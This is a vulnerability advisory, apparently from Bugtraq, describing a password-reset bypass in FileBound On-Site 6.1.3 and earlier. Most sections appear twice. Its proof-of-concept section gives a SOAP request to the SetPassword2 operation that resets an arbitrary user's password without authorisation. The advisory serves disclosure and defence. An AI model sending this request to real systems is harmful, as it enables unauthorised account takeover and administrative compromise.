FileBound On-Site Password Reset Security Bypass Vulnerability
BID:55880
Info
FileBound On-Site Password Reset Security Bypass Vulnerability
| Bugtraq ID: | 55880 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 11 2012 12:00AM |
| Updated: | Oct 15 2012 12:50PM |
| Credit: | Nathaniel Carew from Sense of Security Labs |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
FileBound On-Site Password Reset Security Bypass Vulnerability
FileBound On-Site is prone to a security-bypass vulnerability because it fails to adequately restrict access to the password-reset feature.
An attacker can exploit this issue to gain access to password-reset feature without sufficient privileges and obtain administrative privileges to the application, which may allow the attacker to compromise the application; other attacks are also possible.
FileBound On-Site versions 6.1.3 and prior are vulnerable; other versions may also be affected.
FileBound On-Site is prone to a security-bypass vulnerability because it fails to adequately restrict access to the password-reset feature.
An attacker can exploit this issue to gain access to password-reset feature without sufficient privileges and obtain administrative privileges to the application, which may allow the attacker to compromise the application; other attacks are also possible.
FileBound On-Site versions 6.1.3 and prior are vulnerable; other versions may also be affected.
Exploit / POC
FileBound On-Site Password Reset Security Bypass Vulnerability
Attackers can exploit this issue through a browser.
The following exploit SOAP request is available:
http://www.example.com/Filebound.asmx?op=SetPassword2
<soapenv:Body>
<fil:SetPassword2>
<fil:UserID>32</fil:UserID>
<fil:Password>lightsouthern</fil:Password>
<fil:ResetPasswordExpires>0</fil:ResetPasswordExpires>
</fil:SetPassword2>
</soapenv:Body>
Attackers can exploit this issue through a browser.
The following exploit SOAP request is available:
http://www.example.com/Filebound.asmx?op=SetPassword2
<soapenv:Body>
<fil:SetPassword2>
<fil:UserID>32</fil:UserID>
<fil:Password>lightsouthern</fil:Password>
<fil:ResetPasswordExpires>0</fil:ResetPasswordExpires>
</fil:SetPassword2>
</soapenv:Body>
Solution / Fix
FileBound On-Site Password Reset Security Bypass Vulnerability
Solution:
Reportedly, the issue is fixed; however, Symantec has not confirmed this. Please contact the vendor for more information.
Solution:
Reportedly, the issue is fixed; however, Symantec has not confirmed this. Please contact the vendor for more information.
References
FileBound On-Site Password Reset Security Bypass Vulnerability
References:
References: